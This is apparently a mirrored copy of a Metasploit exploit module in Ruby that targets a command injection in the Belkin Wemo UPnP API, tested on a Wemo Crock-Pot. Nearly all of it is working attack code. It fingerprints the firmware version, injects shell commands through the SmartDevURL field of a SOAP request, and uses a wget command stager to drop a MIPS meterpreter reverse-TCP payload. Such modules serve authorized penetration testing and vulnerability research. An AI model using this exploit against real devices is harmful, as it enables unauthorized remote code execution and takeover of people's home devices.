CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/linux/upnp/belkin_wemo_upnp_exec.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote67Rank = ExcellentRanking89include Msf::Exploit::Remote::HttpClient10include Msf::Exploit::CmdStager11prepend Msf::Exploit::Remote::AutoCheck1213def initialize(info = {})14super(update_info(info,15'Name' => 'Belkin Wemo UPnP Remote Code Execution',16'Description' => %q{17This module exploits a command injection in the Belkin Wemo UPnP API via18the SmartDevURL argument to the SetSmartDevInfo action.1920This module has been tested on a Wemo-enabled Crock-Pot, but other Wemo21devices are known to be affected, albeit on a different RPORT (49153).22},23'Author' => [24'phikshun', # Discovery, UFuzz, and modules25'wvu', # Crock-Pot testing and module26'nstarke' # Version-checking research and implementation27],28'References' => [29['URL', 'https://web.archive.org/web/20150901094849/http://disconnected.io/2014/04/04/universal-plug-and-fuzz/'],30['URL', 'https://github.com/phikshun/ufuzz'],31['URL', 'https://gist.github.com/phikshun/10900566'],32['URL', 'https://gist.github.com/phikshun/9984624'],33['URL', 'https://www.crock-pot.com/wemo-landing-page.html'],34['URL', 'https://www.belkin.com/us/support-article?articleNum=101177'],35['URL', 'http://www.wemo.com/']36],37'DisclosureDate' => '2014-04-04',38'License' => MSF_LICENSE,39'Platform' => ['unix', 'linux'],40'Arch' => [ARCH_CMD, ARCH_MIPSLE],41'Privileged' => true,42'Targets' => [43['Unix In-Memory',44'Platform' => 'unix',45'Arch' => ARCH_CMD,46'Type' => :unix_memory,47'DefaultOptions' => {48'PAYLOAD' => 'cmd/unix/generic'49}50],51['Linux Dropper',52'Platform' => 'linux',53'Arch' => ARCH_MIPSLE,54'Type' => :linux_dropper,55'DefaultOptions' => {56'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'57}58]59],60'DefaultTarget' => 1,61'Notes' => {62'NOCVE' => ['Patched in 2.00.8643 without vendor disclosure'],63'Stability' => [CRASH_SAFE],64'SideEffects' => [ARTIFACTS_ON_DISK],65'Reliability' => [REPEATABLE_SESSION]66}67))6869register_options([70Opt::RPORT(49152)71])7273register_advanced_options([74OptString.new('WritableDir', [true, 'Writable directory', '/tmp'])75])76end7778def check79checkcode = CheckCode::Unknown8081res = send_request_cgi(82'method' => 'GET',83'uri' => '/setup.xml'84)8586unless res && res.code == 200 && res.body.include?('urn:Belkin:device:')87vprint_error('Wemo-enabled device not detected')88return checkcode89end9091vprint_good('Wemo-enabled device detected')92checkcode = CheckCode::Detected9394version = (v = res.get_xml_document.at('firmwareVersion')&.text) &&95v =~ /WeMo_WW_(\d+(?:\.\d+)+)/ && $1 && Rex::Version.new($1)9697unless version98vprint_error('Could not determine firmware version')99return checkcode100end101102vprint_status("Found firmware version: #{version}")103104# https://www.tripwire.com/state-of-security/featured/my-sector-story-root-shell-on-the-belkin-wemo-switch/105if version < Rex::Version.new('2.00.8643')106vprint_good("Firmware version #{version} < 2.00.8643")107checkcode = CheckCode::Appears108else109vprint_error("Firmware version #{version} >= 2.00.8643")110checkcode = CheckCode::Safe111end112113checkcode114end115116def exploit117case target['Type']118when :unix_memory119execute_command(payload.encoded)120when :linux_dropper121cmdstager = generate_cmdstager(122flavor: :wget,123temp: datastore['WritableDir'],124file: File.basename(cmdstager_path),125noconcat: true126)127128# HACK: "chmod +x"129cmdstager.unshift("cp /bin/sh #{cmdstager_path}")130cmdstager.delete_if { |cmd| cmd.start_with?('chmod +x') }131cmdstager = cmdstager.join(';')132133vprint_status("Regenerated command stager: #{cmdstager}")134execute_command(cmdstager)135end136end137138def execute_command(cmd, opts = {})139send_request_cgi(140'method' => 'POST',141'uri' => '/upnp/control/basicevent1',142'ctype' => 'text/xml',143'headers' => {144'SOAPACTION' => '"urn:Belkin:service:basicevent:1#SetSmartDevInfo"'145},146'data' => generate_soap_xml(cmd)147)148end149150def generate_soap_xml(cmd)151<<~EOF152<?xml version="1.0" encoding="utf-8"?>153<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">154<s:Body>155<u:SetSmartDevInfo xmlns:u="urn:Belkin:service:basicevent:1">156<SmartDevURL>$(#{cmd.encode(xml: :text)})</SmartDevURL>157</u:SetSmartDevInfo>158</s:Body>159</s:Envelope>160EOF161end162163def cmdstager_path164@cmdstager_path ||=165"#{datastore['WritableDir']}/#{rand_text_alphanumeric(8..42)}"166end167168end169170171